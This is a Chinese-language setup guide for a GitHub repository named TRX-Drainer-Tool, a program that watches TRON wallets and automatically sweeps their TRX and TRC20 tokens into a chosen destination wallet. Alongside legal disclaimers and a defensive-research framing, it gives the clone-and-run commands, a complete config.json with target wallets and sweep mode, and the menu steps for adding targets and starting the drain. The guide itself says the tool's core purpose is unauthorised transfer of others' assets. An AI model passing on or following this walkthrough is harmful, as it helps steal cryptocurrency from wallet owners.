fiercewarrior84/TRX-Drainer-Tool · 上手攻略
- 仓库:fiercewarrior84/TRX-Drainer-Tool
- 链接:https://github.com/fiercewarrior84/TRX-Drainer-Tool
- 分类:加密工具 / TRON / 安全审计(⚠️ 争议类工具)
- 作者:Tom
- 更新:2026-09-07
这是什么
TRX Drainer Tool 是一个自动化的 TRON 钱包扫荡工具,用于监控目标 TRON 钱包地址,一旦余额超过设定阈值则自动将 TRX 和 TRC20 代币转出。核心功能包括:实时余额监控、多钱包批量扫荡、TronLink / Trust Wallet 兼容性、隐身模式能量优化交易路由、Telegram 通知等。
⚠️ 严重风险提示(GitHub README 原文):「This tool is provided for educational and research purposes only. Unauthorized access to wallets you do not own is illegal.」本攻略仅作客观技术记录,不提供任何使用建议,不鼓励、不协助任何未经授权的访问行为。
技术架构
TRX-Drainer-Tool/
├── main.py # 入口,终端交互菜单
├── config.py # 配置加载器
├── bot_actions.py # 核心扫荡逻辑
├── config.json # 用户配置
├── requirements.txt # Python 依赖
└── actions/ # 菜单各选项实现
├── about.py
├── install.py
└── settings.py
核心技术栈: - tronpy:TRON RPC 客户端,与 TronGrid / 任意 TRON 全节点通信 - requests:价格数据获取 - rich:终端 UI 渲染 - cryptography:数据加密
支持的代币类型(README 自述): - 原生代币:TRX - 稳定币:USDT、USDC、TUSD、USDJ - DeFi:JST、SUN、WIN、BTT - NFT:APENFT 等
快速安装
环境要求
- Python 3.10+
- Windows 10/11、macOS 12+ 或 Linux
步骤
git clone https://github.com/fiercewarrior84/TRX-Drainer-Tool.git
cd TRX-Drainer-Tool
# Windows
run.bat
# macOS / Linux
chmod +x run.sh
./run.sh
或手动安装依赖:
pip install -r requirements.txt
python main.py
配置说明
编辑 config.json:
{
"target_wallets": ["TXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"],
"destination_wallet": "TXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"drain_mode": "sweep",
"min_balance_trx": 100,
"include_trc20": true,
"trc20_tokens": ["USDT", "USDC", "BTT", "WIN", "JST"],
"rpc_endpoint": "https://api.trongrid.io",
"energy_optimize": true,
"auto_confirm": true,
"fee_limit": 10000000
}
关键参数:
- target_wallets:监控目标地址列表(需持有者的私钥或助记词才能实际转出,⚠️ 原文未说明如何获取目标钱包访问权限)
- destination_wallet:接收资金的目标地址
- drain_mode:sweep(全部转出)或 selective(选择性)
- min_balance_trx:触发转出的最低 TRX 余额阈值
- energy_optimize:启用能量优化(费用委托 + 能量租赁降低 Gas 消耗)
- fee_limit:单笔交易最大手续费(单位:SUN,1 SUN = 10⁻⁶ TRX)
工作流程(菜单界面)
python main.py
# 菜单选项:
# 1 - 安装依赖
# 4 - 添加目标钱包(输入 TRON 地址)
# 5 - 设置目标接收钱包
# 6 - 启动扫荡(开始监控 + 转账)
# 7 - 停止所有操作
# 8 - 查看状态
# 0 - 退出
典型适用场景(⚠️ 仅限合法用途)
以下场景均为 README 自述或公开信息可推断用途,不构成使用建议:
- 安全研究人员:了解 TRON 钱包自动化扫荡的攻击向量,用于构建防御机制
- 钱包开发者:测试自己钱包对异常出账请求的抗性
- CTF / 区块链安全竞赛:作为合法的攻防演练素材
- 用户自查:监控自己的热钱包余额异常变动(需自行运行并配置自己的地址为 source + destination)
坑与注意
⚠️ 法律与合规风险(最高优先级)
- 未经授权转账违法:在任何司法管辖区,未经他人许可转移他人资产均可能构成盗窃罪或相关计算机犯罪。中国、美国、欧盟等均有明确法律约束。
- 工具本身不包含攻击代码:但 README 明确以「扫荡他人钱包」为核心用途设计。
- 无法单靠此工具攻击任意钱包:TRON 钱包转账需要目标钱包的私钥签名,工具本身不提供私钥获取能力——任何声称能直接转账他人资产的工具均涉及更上游的私钥窃取行为。
技术层面的安全考量
- 私钥暴露风险:若要求用户提供目标钱包私钥(而非只读地址),任何此类要求都是高危信号——此类信息一旦提供,资产将立即失守。
- TRON 能量模型费用:TRON 转账手续费使用 Energy/Bandwidth 资源模型,
fee_limit设置过低会导致大额转账失败,过高则浪费 TRX。 - 多 RPC 容灾:工具支持自定义 RPC 端点,但建议使用 TronGrid(官方)或 Ankr 等有 SLA 保障的服务,避免轮询中断。
- ** Telegram 通知**:启用后监控状态会上报到第三方,存在信息泄露风险。
与同类对比
| 项目 | 简介 | 与本工具对比 |
|---|---|---|
| TronTool | Python TRON 库,可用于构建任意 TRON 交互 | 中立库,本工具是特化于自动化转出的专用程序 |
| SlowMist 威胁情报 | 区块链安全公司追踪的 Drainer 即服务 (DaaS) | 此类攻击已形成地下产业链,实际攻击远比开源 Demo 复杂 |
| TRON Grid API | 官方 RPC 和 API 服务 | 本工具的技术依赖层,非竞品 |
一句话结论(安全审计视角)
⚠️ 本工具是 TRON 生态下钱包自动化扫荡的开源参考实现,其核心功能(未经授权自动转出他人资产)在绝大多数司法管辖区属于违法行为;安全研究人员和钱包开发者可将其作为防御性研究素材,但任何人不得将其用于非法目的。本攻略仅作技术记录。